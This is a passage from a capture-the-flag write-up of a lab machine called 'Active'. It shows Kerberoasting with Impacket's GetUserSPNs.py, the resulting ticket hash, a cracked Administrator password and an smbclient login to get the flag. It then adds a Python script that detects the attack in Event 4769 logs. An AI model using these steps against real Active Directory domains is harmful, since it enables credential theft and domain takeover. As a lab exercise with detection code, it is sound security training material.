PrivEsc

Kerberoasting

With our newly found credentials we can use GetUserSPNs.py to find kerberoastable accounts:

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 14:06:40.351723  2025-01-28 13:22:38.706967             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$00397987408f0444b049f7ef1fb744ef$...

Cracking this hash offline gives us a new pair of credentials: Administrator:Ticketmaster1968

Now we get the root flag:

smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968
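
On the domain controller, the service ticket request from the Kerberoasting step is logged as Security Event ID 4769 with ticket encryption type 0x17 (the 23 in $krb5tgs$23$), provided Kerberos service ticket auditing is enabled. The Python below is an added detection example, not part of the original writeup; the JSON-lines records, the source IP, the DC$ and svc_sql names and the privileged-account list are constructed assumptions.

```python
import json

RC4_HMAC = 0x17  # etype 23, the "$23$" in the $krb5tgs$23$ output above

# Constructed sample records (not from the original page). Field names follow
# the EventData of Windows Security Event ID 4769; values are made up.
SAMPLE_EVENTS = """
{"TimeCreated":"2025-01-28T13:30:01Z","TargetUserName":"SVC_TGS@ACTIVE.HTB","ServiceName":"Administrator","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.5","Status":"0x0"}
{"TimeCreated":"2025-01-28T13:30:05Z","TargetUserName":"SVC_TGS@ACTIVE.HTB","ServiceName":"DC$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.10.14.5","Status":"0x0"}
{"TimeCreated":"2025-01-28T13:31:00Z","TargetUserName":"DC$@ACTIVE.HTB","ServiceName":"krbtgt","TicketEncryptionType":"0x12","IpAddress":"::1","Status":"0x0"}
{"TimeCreated":"2025-01-28T13:31:40Z","TargetUserName":"SVC_TGS@ACTIVE.HTB","ServiceName":"svc_sql","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.5","Status":"0x0"}
{"TimeCreated":"2025-01-28T13:32:10Z","TargetUserName":"SVC_TGS@ACTIVE.HTB","ServiceName":"Administrator","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.10.14.5","Status":"0x1b"}
"""


def classify(ev, privileged):
    """Return None, "medium" or "high" for one 4769 record."""
    service = ev["ServiceName"].lower()
    requester = ev["TargetUserName"].split("@")[0]
    if int(ev["Status"], 16) != 0:
        return None  # request failed, no ticket was issued
    if service.endswith("$") or service == "krbtgt" or requester.endswith("$"):
        return None  # machine/krbtgt keys are random; computer requesters are routine noise
    if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
        return None  # only RC4 tickets for user-backed SPNs are flagged here
    return "high" if service in privileged else "medium"


def detect(raw, privileged=("administrator",)):
    """Scan JSON-lines 4769 records and return one tuple per alert."""
    privileged = {p.lower() for p in privileged}
    alerts = []
    for line in raw.strip().splitlines():
        ev = json.loads(line)
        severity = classify(ev, privileged)
        if severity:
            alerts.append((ev["TimeCreated"], ev["TargetUserName"],
                           ev["ServiceName"], ev["IpAddress"], severity))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(*alert)
```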
